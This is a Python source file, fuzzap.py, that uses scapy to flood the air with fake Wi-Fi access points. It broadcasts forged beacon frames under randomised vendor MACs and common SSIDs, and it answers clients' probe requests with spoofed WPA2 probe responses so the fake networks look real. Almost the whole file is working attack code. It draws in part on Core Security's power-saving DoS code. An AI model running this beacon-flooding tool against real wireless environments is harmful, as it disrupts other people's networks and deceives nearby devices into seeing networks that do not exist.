fuzzap.py

1. '''
2.    Copyright 2013 Brendan Scherer
3.  
4.    This program is free software: you can redistribute it and/or modify
5.    it under the terms of the GNU General Public License as published by
6.    the Free Software Foundation, either version 3 of the License, or
7.    (at your option) any later version.
8.  
9.    This program is distributed in the hope that it will be useful,
10.    but WITHOUT ANY WARRANTY; without even the implied warranty of
11.    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12.    GNU General Public License for more details.
13.  
14.    You should have received a copy of the GNU General Public License
15.    along with this program.  If not, see <http://www.gnu.org/licenses/>.
16.  
17.    Small portion of code was taken from Core Security Technologies' Power-saving DoS.
18.    Their copyright follows, their code is marked below
19.  
20. #  Copyright (c) 2009 Core Security Technologies
21. #
22. #  Author: Leandro Meiners (lea@coresecurity.com)
23. #
24. #  Permission to use, copy, modify, and distribute this software for any
25. #  purpose with or without fee is hereby granted, provided that the above
26. #  copyright notice and this permission notice appear in all copies.
27. #
28. #  THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
29. #  WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
30. #  MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
31. #  ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
32. #  WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
33. #  ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
34. #  OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
35.  
36. The common SSID list was pulled from https://wigle.net/gps/gps/Stat
37. The OUI vendor list was parsed from http://standards.ieee.org/develop/regauth/oui/oui.txt
38. for well known vendors (netgear, cisco, linksys, d-link, atheros, ralink, apple)
39.  
40. '''
41.  
42. #!/usr/bin/python
43.  
44. import signal
45. import sys
46. import time
47. import logging
48. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
49. from scapy.config import *
50. from scapy.layers.dot11 import *
51. from scapy.utils import *
52. import argparse
53. import random
54. from multiprocessing import Process
55.  
56. mlist = []
57. sid = []
58. ftime = time.time() * 1000000
59. parser = argparse.ArgumentParser()
60. parser.add_argument("interface", help="Specifies the interface in monitor mode to use")
61. parser.add_argument("APs", help="Number of fake access points to create", type=int)
62.  
63. args = parser.parse_args()
64. ifce = args.interface
65. APs = args.APs
66.  
67. def uptime():
68.         microtime = int(round(time.time() * 1000000)) - ftime
69.         return microtime
70.  
71. def generate_mac():
72.  
73.     try:
74.         #Grab a common OUI from file based off of the IEEE list at http://standards.ieee.org/develop/regauth/oui/oui.txt
75.         mac = random.choice(open("common.txt").readlines())
76.  
77.     except IOError as ioe:
78.         print "Cannot read common.txt. Does the file exist? Do you have permissions? {0}: {1}".format(ioe.errno, ioe.strerror)
79.  
80.     iter = 0
81.  
82.     # We have to create the last three bits of the mac address since we grabbed the first three from file
83.     while iter < 3:
84.  
85.         #Generate a random integer between 0 and 255 to match the possible combinations for the MAC
86.         ranint = random.randint(0,255)
87.         int2 = 0
88.  
89.         #We have an exception in case the random integer is less than 16, as we would only get one character instead of two
90.         if ranint < 16:
91.            
92.             int2 = random.randint(0,15)
93.             mac += ":" + hex(ranint)[2:] + hex(int2)[2:]
94.             iter += 1
95.  
96.         else:
97.  
98.             mac += ":" + hex(ranint)[2:]
99.             iter += 1
100.  
101.     #When we return the mac, it has newlines due to reading from file. We need to strip those before we return the mac
102.     return mac.replace("\n", "")
103.  
104. def beacon_frame(bssids,macaddrs,ifce):    
105.     while True:
106.         for n in range(len(bssids)):
107.             sendp(RadioTap()/
108.                 Dot11(addr1="ff:ff:ff:ff:ff:ff",
109.                 addr2=macaddrs[n],
110.                 addr3=macaddrs[n])/
111.                 Dot11Beacon(cap="ESS", timestamp=uptime())/
112.                 Dot11Elt(ID="SSID", info=bssids[n])/
113.                 Dot11Elt(ID="Rates", info='\x82\x84\x0b\x16')/
114.                 Dot11Elt(ID="DSset", info="\x03")/
115.                 Dot11Elt(ID="TIM", info="\x00\x01\x00\x00"),
116.                 iface=ifce, loop=0, verbose=False)
117.         time.sleep(.102)
118.  
119. def load_vendor(num_of_aps):
120.    
121.     #Generate some mac addresses and shove them in a list
122.     for n in range(num_of_aps):
123.         mlist.append(generate_mac())
124.  
125. def load_ssid(num_of_aps):
126.    
127.     #Grab some random SSIDs from the wigle list and shove'm in a list
128.     for n in range(num_of_aps):
129.         sid.append(generate_ssid())
130.  
131. def generate_ssid():
132.  
133.     try:
134.         #Pull a random SSID from a file with the top 1000 most common SSIDs from https://wigle.net/gps/gps/Stat
135.    
136.         ssid = random.choice(open("ssid.txt").readlines())
137.  
138.     except IOError as ioer:
139.         print "Could not open ssid.txt. Does the file exist? Do you have the correct permissions? {0}: {1}".format(ioer.errno, ioer.strerror)
140.  
141.     #Return the SSID from file while stripping the new-line from the output
142.     return ssid.replace("\n", "")
143.  
144. def probe_response(ssid, macs, rates, stamac, ifce):
145.  
146.     sendp(RadioTap(present=18479L)/
147.         Dot11(addr2=macs, addr3=macs, addr1=stamac, FCfield=8L)/
148.         Dot11ProbeResp(beacon_interval=102, cap=12548L, timestamp=uptime())/
149.         Dot11Elt(info=ssid, ID=0)/
150.         Dot11Elt(info=rates, ID=1)/
151.         Dot11Elt(info='\x01', ID=3, len=1)/
152.         Dot11Elt(info='\x00', ID=42, len=1)/
153.         Dot11Elt(info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x02\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02(\x00', ID=48, len=24)/
154.         Dot11Elt(info='H`l', ID=50, len=3), iface=ifce, loop=0, verbose=False)
155.  
156. def sig_int(sigint, frame):
157.     print("Shutting down....")
158.     sys.exit(0)
159.  
160. def main():
161.    
162.     signal.signal(signal.SIGINT, sig_int)
163.  
164.     #load all of our MACs and SSIDs to spam
165.     load_vendor(APs)
166.     load_ssid(APs)
167.    
168.     #Fork out the beacon frames
169.     Process(target=beacon_frame, args=(sid,mlist,ifce)).start()
170.  
171.     #Start sniffing for probe request from our previously forked out beacon frames, and grab the ssid, rates, and MAC they are referencing
172.     while True:
173.         ssid = None
174.         rates = None
175.         macs = None
176.        
177.         #start sniffing
178.         p=sniff(iface=ifce, count=1)[0]
179.        
180.         #If the sniffed packet is a probe request and is sending it to one of our MAC addresses
181.         if p.haslayer(Dot11ProbeReq) and p.addr1 in mlist:
182.             pkt = p.getlayer(Dot11Elt)
183.             macs = p.addr1
184.  
185.             # Start Core Security's code
186.             while pkt:
187.                 if pkt.ID == 0:
188.  
189.                     #ID 0's info portion of a 802.11 packet is the SSID, grab it
190.                     ssid = pkt.info
191.                 if pkt.ID == 1:
192.  
193.                     #ID 1's info portion of a 802.11 packet is the supported rates, grab it
194.                     rates = pkt.info
195.                 pkt = pkt.payload
196.             #End Core Security's code
197.  
198.             probe_response(ssid, macs, rates, p.addr2, ifce)
199.  
200. main()